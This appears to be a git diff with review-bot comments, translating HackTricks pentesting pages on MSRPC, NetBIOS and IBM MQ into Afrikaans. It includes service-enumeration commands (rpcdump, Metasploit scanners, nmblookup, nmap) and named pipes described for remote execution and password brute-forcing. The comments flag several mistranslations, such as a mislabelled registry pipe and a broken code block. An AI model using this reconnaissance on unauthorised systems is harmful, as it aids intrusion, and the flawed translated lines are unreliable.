+Die Microsoft Remote Procedure Call (MSRPC) protokol, 'n klient-bedienermodel wat 'n program in staat stel om 'n diens van 'n program op 'n ander rekenaar aan te vra sonder om die spesifieke netwerk te verstaan, is aanvanklik afgelei van oopbron sagteware en later ontwikkel en gekopieer deur Microsoft. +Die RPC-eindpuntkartering kan benader word via TCP- en UDP-poort 135, SMB op TCP 139 en 445 (met 'n nul- of geauthentiseerde sessie), en as 'n webdiens op TCP-poort 593. ``` 135/tcp open msrpc Microsoft Windows RPC ``` +## Hoe werk MSRPC? -## How does MSRPC work? - -Initiated by the client application, the MSRPC process involves calling a local stub procedure that then interacts with the client runtime library to prepare and transmit the request to the server. This includes converting parameters into a standard Network Data Representation format. The choice of transport protocol is determined by the runtime library if the server is remote, ensuring the RPC is delivered through the network stack. +Geïnitieer deur die kliënttoepassing, behels die MSRPC-proses die oproep van 'n plaaslike stub-prosedure wat dan interaksie hê met die kliënt-runtime-biblioteek om die versoek voor te berei en oor te dra na die bediener. Dit sluit in die omskakeling van parameters na 'n standaard Netwerkdata-voorstelling-formaat. Die keuse van vervoerprotokol word bepaal deur die runtime-biblioteek as die bediener afgeleë is, om te verseker dat die RPC deur die netwerkstapel afgelewer word. ![https://0xffsec.com/handbook/images/msrpc.png](https://0xffsec.com/handbook/images/msrpc.png) -## **Identifying Exposed RPC Services** - - -Exposure of RPC services across TCP, UDP, HTTP, and SMB can be determined by querying the RPC locator service and individual endpoints. 
Tools such as rpcdump facilitate the identification of unique RPC services, denoted by **IFID** values, revealing service details and communication bindings: +## **Identifisering van Blootgestelde RPC-dienste** +Die blootstelling van RPC-dienste oor TCP, UDP, HTTP en SMB kan bepaal word deur die RPC-lokator-diens en individuele eindpunte te ondervra. Hulpmiddels soos rpcdump fasiliteer die identifisering van unieke RPC-dienste, aangedui deur **IFID**-waardes, wat diensbesonderhede en kommunikasiebindings openbaar: ``` D:\rpctools> rpcdump [-p port] **IFID**: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0 @@ -57,9 +53,7 @@ Annotation: Messenger Service UUID: 00000000-0000-0000-0000-000000000000 Binding: ncadg_ip_udp:[1028] ``` - -Access to the RPC locator service is enabled through specific protocols: ncacn\_ip\_tcp and ncadg\_ip\_udp for accessing via port 135, ncacn\_np for SMB connections, and ncacn\_http for web-based RPC communication. The following commands exemplify the utilization of Metasploit modules to audit and interact with MSRPC services, primarily focusing on port 135: - +Toegang tot die RPC-lokator-diens is moontlik deur spesifieke protokolle: ncacn\_ip\_tcp en ncadg\_ip\_udp vir toegang via poort 135, ncacn\_np vir SMB-verbindings, en ncacn\_http vir webgebaseerde RPC-kommunikasie. Die volgende opdragte illustreer die gebruik van Metasploit-modules om MSRPC-dienste te oudit en mee te skakel, met die klem op poort 135: ```bash use auxiliary/scanner/dcerpc/endpoint_mapper use auxiliary/scanner/dcerpc/hidden 
@@ -67,90 +61,89 @@ use auxiliary/scanner/dcerpc/management use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor rpcdump.py -p 135 ``` +Alle opsies behalwe `tcp_dcerpc_auditor` is spesifiek ontwerp vir die teiken van MSRPC op poort 135. -All options except `tcp_dcerpc_auditor` are specifically designed for targeting MSRPC on port 135. - -#### Notable RPC interfaces +#### Noemenswaardige RPC-koppelvlakke * **IFID**: 12345778-1234-abcd-ef00-0123456789ab -* **Named Pipe**: `\pipe\lsarpc` -* **Description**: LSA interface, used to enumerate users. +* **Genoemde Pyp**: `\pipe\lsarpc` +* **Beskrywing**: LSA-koppelvlak, gebruik om gebruikers op te som. * **IFID**: 3919286a-b10c-11d0-9ba8-00c04fd92ef5 -* **Named Pipe**: `\pipe\lsarpc` -* **Description**: LSA Directory Services (DS) interface, used to enumerate domains and trust relationships. +* **Genoemde Pyp**: `\pipe\lsarpc` +* **Beskrywing**: LSA Directory Services (DS) koppelvlak, gebruik om domeine en vertrouensverhoudings op te som. * **IFID**: 12345778-1234-abcd-ef00-0123456789ac -* **Named Pipe**: `\pipe\samr` -* **Description**: LSA SAMR interface, used to access public SAM database elements (e.g., usernames) and brute-force user passwords regardless of account lockout policy. +* **Genoemde Pyp**: `\pipe\samr` +* **Beskrywing**: LSA SAMR-koppelvlak, gebruik om openbare SAM-databasis-elemente (bv. gebruikersname) en gebruikerswagwoorde te kragtig, ongeag rekeningblokkeringbeleid. * **IFID**: 1ff70682-0a51-30e8-076d-740be8cee98b -* **Named Pipe**: `\pipe\atsvc` -* **Description**: Task scheduler, used to remotely execute commands. +* **Genoemde Pyp**: `\pipe\atsvc` +* **Beskrywing**: Taakbeplanner, gebruik om opdragte op afstand uit te voer. * **IFID**: 338cd001-2244-31f1-aaaa-900038001003 -* **Named Pipe**: `\pipe\winreg` -* **Description**: Remote registry service, used to access and modify the system registry. 
+* **Genoemde Pyp**: `\pipe\winreg` +* **Beskrywing**: Diensbeheerder, gebruik om toegang tot en wysiging van die stelselregister te verkry. * **IFID**: 367abb81-9844-35f1-ad32-98f038001003 -* **Named Pipe**: `\pipe\svcctl` -* **Description**: Service control manager and server services, used to remotely start and stop services and execute commands. +* **Genoemde Pyp**: `\pipe\svcctl` +* **Beskrywing**: Diensbeheerder en bedienerdienste, gebruik om dienste op afstand te begin en te stop en opdragte uit te voer. * **IFID**: 4b324fc8-1670-01d3-1278-5a47bf6ee188 -* **Named Pipe**: `\pipe\srvsvc` -* **Description**: Service control manager and server services, used to remotely start and stop services and execute commands. +* **Genoemde Pyp**: `\pipe\srvsvc` +* **Beskrywing**: Diensbeheerder en bedienerdienste, gebruik om dienste op afstand te begin en te stop en opdragte uit te voer. * **IFID**: 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 -* **Named Pipe**: `\pipe\epmapper` -* **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM. +* **Genoemde Pyp**: `\pipe\epmapper` +* **Beskrywing**: DCOM-koppelvlak, gebruik vir kragtige wagwoordkrag en inligtingversameling via WM. -### Identifying IP addresses +### Identifisering van IP-adresse -Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), comes from [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) is possible to abuse the _**ServerAlive2**_ method inside the _**IOXIDResolver**_ interface. +Deur [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver) te gebruik, afkomstig van [Airbus-navorsing](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/), is dit moontlik om die _**ServerAlive2**_-metode binne die _**IOXIDResolver**_-koppelvlak te misbruik. 
-This method has been used to get interface information as **IPv6** address from the HTB box _APT_. See [here](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) for 0xdf APT writeup, it includes an alternative method using rpcmap.py from [Impacket](https://github.com/SecureAuthCorp/impacket/) with _stringbinding_ (see above). +Hierdie metode is gebruik om koppelvlakinligting as **IPv6**-adres van die HTB-boks _APT_ te verkry. Sien [hier](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) vir 0xdf APT-verslag, dit sluit 'n alternatiewe metode in wat rpcmap.py van [Impacket](https://github.com/SecureAuthCorp/impacket/) met _stringbinding_ gebruik (sien hierbo). -## Port 593 +## Poort 593 -The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) can interact with this port. +Die **rpcdump.exe** van [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) kan met hierdie poort kommunikeer. -#​# References +#​# Verwysings * [https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) * [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/) * [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/)
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutvinders te kommunikeer! **Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +Raak betrokke by inhoud wat die opwinding en uitdagings van hackering ondersoek **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Bly op hoogte van die vinnige hackeringwêreld deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig oor die nuutste foutvindings wat bekendgestel word en noodsaaklike platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hackering van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hackeringtruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
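Review bot: In hunk `@@ -2,54 +2,50 @@` the Basic Information paragraph mistranslates "copyrighted by Microsoft" as "gekopieer deur Microsoft", which means "copied by Microsoft"; use "deur Microsoft van kopiereg voorsien" (or "kopieregbeskerm"). In the same hunk, "wat dan interaksie hê met" should read "wat dan interaksie het met", and the banner heading "Hack-nuus in werklikheid" renders "Real-Time Hack News" as "hack news in reality"; "Intydse hack-nuus" keeps the meaning.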
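Review bot: In hunk `@@ -57,9 +53,7 @@` the only change besides the translation is that the blank lines before and after the "Toegang tot die RPC-lokator-diens..." paragraph were dropped, so the paragraph now butts directly against the closing ``` of the rpcdump output and the opening ```bash fence; the line-count shrink on every hunk header in this patch shows the same stripping happened throughout. Keep the blank lines the English source had around fenced blocks so the layout of the translated page matches the original.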
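Review bot: In hunk `@@ -67,90 +61,89 @@` the `\pipe\winreg` entry is now described as "Diensbeheerder" (service control manager) instead of the remote registry service the English line states; it should read along the lines of "Afgeleë registerdiens, gebruik om toegang tot die stelselregister te verkry en dit te wysig". In the same list, "brute-force" has become meaningless ("gebruikerswagwoorde te kragtig" for SAMR, "kragtige wagwoordkrag" for the DCOM entry); keep the technical term, e.g. "gebruikerswagwoorde met brute krag te raai", and the SAMR entry also lost "toegang tot" before the SAM elements. Consider keeping "Named Pipe" untranslated rather than "Genoemde Pyp", since it is the Windows term practitioners search for. Terminology is inconsistent within the file: "hacking" versus "hackering", "foutjagters" versus "foutvinders", and the second banner leaves the headings "**Hacking Insights**" and "**Real-Time Hack News**" in English while the first banner translated them. Finally, the "#​# Verwysings" heading carries a stray invisible character between the two `#` on both the `-` and the `+` line, so it would not render as a heading; since the line is touched anyway, replace it with a plain `## Verwysings`.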
diff --git a/network-services-pentesting/137-138-139-pentesting-netbios.md b/network-services-pentesting/137-138-139-pentesting-netbios.md index f0a903857..d20070227 100644 --- a/network-services-pentesting/137-138-139-pentesting-netbios.md +++ b/network-services-pentesting/137-138-139-pentesting-netbios.md @@ -2,108 +2,100 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## NetBios Name Service +## NetBios Naamdiens -**NetBIOS Name Service** plays a crucial role, involving various services such as **name registration and resolution**, **datagram distribution**, and **session services**, utilizing specific ports for each service. +**NetBIOS Naamdiens** speel 'n belangrike rol en behels verskeie dienste soos **naamregistrasie en -oplossing**, **datagramverspreiding** en **sessiedienste**, wat spesifieke poorte vir elke diens gebruik. -[From Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP): +[Vanaf Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP): -* Name service for name registration and resolution (ports: 137/udp and 137/tcp). -* Datagram distribution service for connectionless communication (port: 138/udp). -* Session service for connection-oriented communication (port: 139/tcp). +* Naamdiens vir naamregistrasie en -oplossing (poorte: 137/udp en 137/tcp). +* Datagramverspreidingsdiens vir verbindingslose kommunikasie (poort: 138/udp). +* Sessiediens vir verbindingsgeoriënteerde kommunikasie (poort: 139/tcp). -### Name Service - -For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a **broadcast process** where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a **Name Service server** can be queried directly to check for name availability or to resolve a name to an IP address. Tools like `nmblookup`, `nbtscan`, and `nmap` are utilized for enumerating NetBIOS services, revealing server names and MAC addresses. +### Naamdiens +Om 'n toestel aan 'n NetBIOS-netwerk te laat deelneem, moet dit 'n unieke naam hê. Dit word bereik deur 'n **uitsaaiingsproses** waar 'n "Naamnavraag" pakkie gestuur word. As geen besware ontvang word nie, word die naam as beskikbaar beskou. 
Alternatiewelik kan 'n **Naamdiens-bediener** direk ondervra word om naambeskikbaarheid te kontroleer of om 'n naam na 'n IP-adres op te los. Hulpmiddels soos `nmblookup`, `nbtscan` en `nmap` word gebruik om NetBIOS-dienste op te som, waardeur bedienername en MAC-adresse onthul word. ```bash PORT STATE SERVICE VERSION 137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP) ``` +### NetBIOS-dienste pentesting -Enumerating a NetBIOS service you can obtain the names the server is using and the MAC address of the server. - +By die ondersoek van 'n NetBIOS-diens kan jy die name verkry wat die bediener gebruik, sowel as die MAC-adres van die bediener. ```bash nmblookup -A nbtscan /30 sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n ``` +### Datagramverspreidingsdiens -### Datagram Distribution Service - -NetBIOS datagrams allow for connectionless communication via UDP, supporting direct messaging or broadcasting to all network names. This service uses port **138/udp**. - +NetBIOS-datagramme maak gebruik van UDP vir verbindingslose kommunikasie, wat direkte boodskappe of uitsaai na alle netwerkname ondersteun. Hierdie diens maak gebruik van poort **138/udp**. ```bash PORT STATE SERVICE VERSION 138/udp open|filtered netbios-dgm ``` +### Sessiediens -### Session Service +Vir verbindingsgeoriënteerde interaksies fasiliteer die **Sessiediens** 'n gesprek tussen twee toestelle deur gebruik te maak van **TCP**-verbindings deur poort **139/tcp**. 'n Sessie begin met 'n "Sessieversoek" pakkie en kan gevestig word op grond van die reaksie. Die diens ondersteun groter boodskappe, foutopsporing en herstel, met TCP wat vloeibeheer en pakkiehertransmissie hanteer. -For connection-oriented interactions, the **Session Service** facilitates a conversation between two devices, leveraging **TCP** connections through port **139/tcp**. A session begins with a "Session Request" packet and can be established based on the response. 
The service supports larger messages, error detection, and recovery, with TCP handling flow control and packet retransmission. - -Data transmission within a session involves **Session Message packets**, with sessions being terminated by closing the TCP connection. - -These services are integral to **NetBIOS** functionality, enabling efficient communication and resource sharing across a network. For more information on TCP and IP protocols, refer to their respective [TCP Wikipedia](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) and [IP Wikipedia](https://en.wikipedia.org/wiki/Internet_Protocol) pages. +Data-oordrag binne 'n sessie behels **Sessieboodskappakkies**, met sessies wat beëindig word deur die TCP-verbinding te sluit. +Hierdie dienste is integraal tot die funksionaliteit van **NetBIOS**, wat doeltreffende kommunikasie en hulpbron-deling oor 'n netwerk moontlik maak. Vir meer inligting oor TCP- en IP-protokolle, verwys na hul onderskeie [TCP Wikipedia](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) en [IP Wikipedia](https://en.wikipedia.org/wiki/Internet_Protocol) bladsye. ```bash PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn ``` - -**Read the next page to learn how to enumerate this service:** +**Lees die volgende bladsy om te leer hoe om hierdie diens te ondersoek:** {% content-ref url="137-138-139-pentesting-netbios.md" %} [137-138-139-pentesting-netbios.md](137-138-139-pentesting-netbios.md) {% endcontent-ref %} -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: Netbios #Protocol Abbreviation if there is one. Port_Number: 137,138,139 #Comma separated if there is more than one. Protocol_Description: Netbios #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for NetBios - Note: | - Name service for name registration and resolution (ports: 137/udp and 137/tcp). 
- Datagram distribution service for connectionless communication (port: 138/udp). - Session service for connection-oriented communication (port: 139/tcp). +Name: Notes +Description: Notes for NetBios +Note: | +Name service for name registration and resolution (ports: 137/udp and 137/tcp). +Datagram distribution service for connectionless communication (port: 138/udp). +Session service for connection-oriented communication (port: 139/tcp). - For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a broadcast process where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a Name Service server can be queried directly to check for name availability or to resolve a name to an IP address. +For a device to participate in a NetBIOS network, it must have a unique name. This is achieved through a broadcast process where a "Name Query" packet is sent. If no objections are received, the name is considered available. Alternatively, a Name Service server can be queried directly to check for name availability or to resolve a name to an IP address. - https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios +https://book.hacktricks.xyz/pentesting/137-138-139-pentesting-netbios Entry_2: - Name: Find Names - Description: Three scans to find the names of the server - Command: nmblookup -A {IP} &&&& nbtscan {IP}/30 &&&& nmap -sU -sV -T4 --script nbstat.nse -p 137 -Pn -n {IP} +Name: Find Names +Description: Three scans to find the names of the server +Command: nmblookup -A {IP} &&&& nbtscan {IP}/30 &&&& nmap -sU -sV -T4 --script nbstat.nse -p 137 -Pn -n {IP} ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
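Review bot: In hunk `@@ -2,108 +2,100 @@` the translation altered the contents of the "HackTricks Automatic Commands" fenced block: the indented children of `Entry_1:` and `Entry_2:` (`- Name: Notes`, `- Note: |`, the lines under the `|` literal block, and the URL) were de-indented to column zero (`+Name: Notes`, `+Note: |`, `+https://book.hacktricks.xyz/...`), which breaks the nesting of the block and the literal scalar under `Note: |`. Translation must leave fenced code byte-identical; restore the original indentation. Two further points: the `+### NetBIOS-dienste pentesting` heading before the nmblookup/nbtscan block has no counterpart in the English source, so the translated page gains a section the original does not have; and the pre-existing typo "Wikidepia" was carried over as "Vanaf Wikidepia", which is worth correcting to "Wikipedia" while the line is being rewritten. "hoe om hierdie diens te ondersoek" for "enumerate this service" is also inconsistent with "op te som" used earlier in the same hunk.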
diff --git a/network-services-pentesting/1414-pentesting-ibmmq.md b/network-services-pentesting/1414-pentesting-ibmmq.md index 531f7a94f..1c4f59d65 100644 --- a/network-services-pentesting/1414-pentesting-ibmmq.md +++ b/network-services-pentesting/1414-pentesting-ibmmq.md @@ -2,108 +2,101 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Basic information +## Basiese inligting -IBM MQ is an IBM technology to manage message queues. As other **message broker** technologies, it is dedicated to receive, store, process and classify information between producers and consumers. +IBM MQ is 'n IBM-tegnologie om boodskaprye te bestuur. Soos ander **boodskapmakelaar**-tegnologieë, is dit toegewy aan die ontvang, stoor, verwerk en klassifiseer van inligting tussen produsente en verbruikers. -By default, **it exposes IBM MQ TCP port 1414**. -Sometimes, HTTP REST API can be exposed on port **9443**. -Metrics (Prometheus) could also be accessed from TCP port **9157**. +Standaard **stel dit IBM MQ TCP-poort 1414 bloot**. +Soms kan die HTTP REST API op poort **9443** blootgestel word. +Metriek (Prometheus) kan ook vanaf TCP-poort **9157** benader word. -The IBM MQ TCP port 1414 can be used to manipulate messages, queues, channels, ... but **also to control the instance**. +Die IBM MQ TCP-poort 1414 kan gebruik word om boodskappe, rykies, kanale, ... te manipuleer, maar **ook om die instansie te beheer**. -IBM provides a large technical documentation available on [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq). +IBM bied 'n groot tegniese dokumentasie aan wat beskikbaar is op [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq). -## Tools +## Gereedskap -A suggested tool for easy exploitation is **[punch-q](https://github.com/sensepost/punch-q)**, with Docker usage. The tool is actively using the Python library `pymqi`. +'n Voorgestelde gereedskap vir maklike uitbuiting is **[punch-q](https://github.com/sensepost/punch-q)**, met Docker-gebruik. Die gereedskap maak aktief gebruik van die Python-biblioteek `pymqi`. -For a more manual approach, use the Python library **[pymqi](https://github.com/dsuch/pymqi)**. 
[IBM MQ dependencies](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) are needed. +Vir 'n meer handmatige benadering, gebruik die Python-biblioteek **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ-afhanklikhede](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) is nodig. -### Installing pymqi +### Installeer pymqi -**IBM MQ dependencies** needs to be installed and loaded: +**IBM MQ-afhanklikhede** moet geïnstalleer en gelaai word: -1. Create an account (IBMid) on [https://login.ibm.com/](https://login.ibm.com/). -2. Download IBM MQ libraries from [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). For Linux x86_64 it is **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**. -3. Decompress (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`). -4. Run `sudo ./mqlicense.sh` to accept licenses terms. +1. Skep 'n rekening (IBMid) op [https://login.ibm.com/](https://login.ibm.com/). +2. 
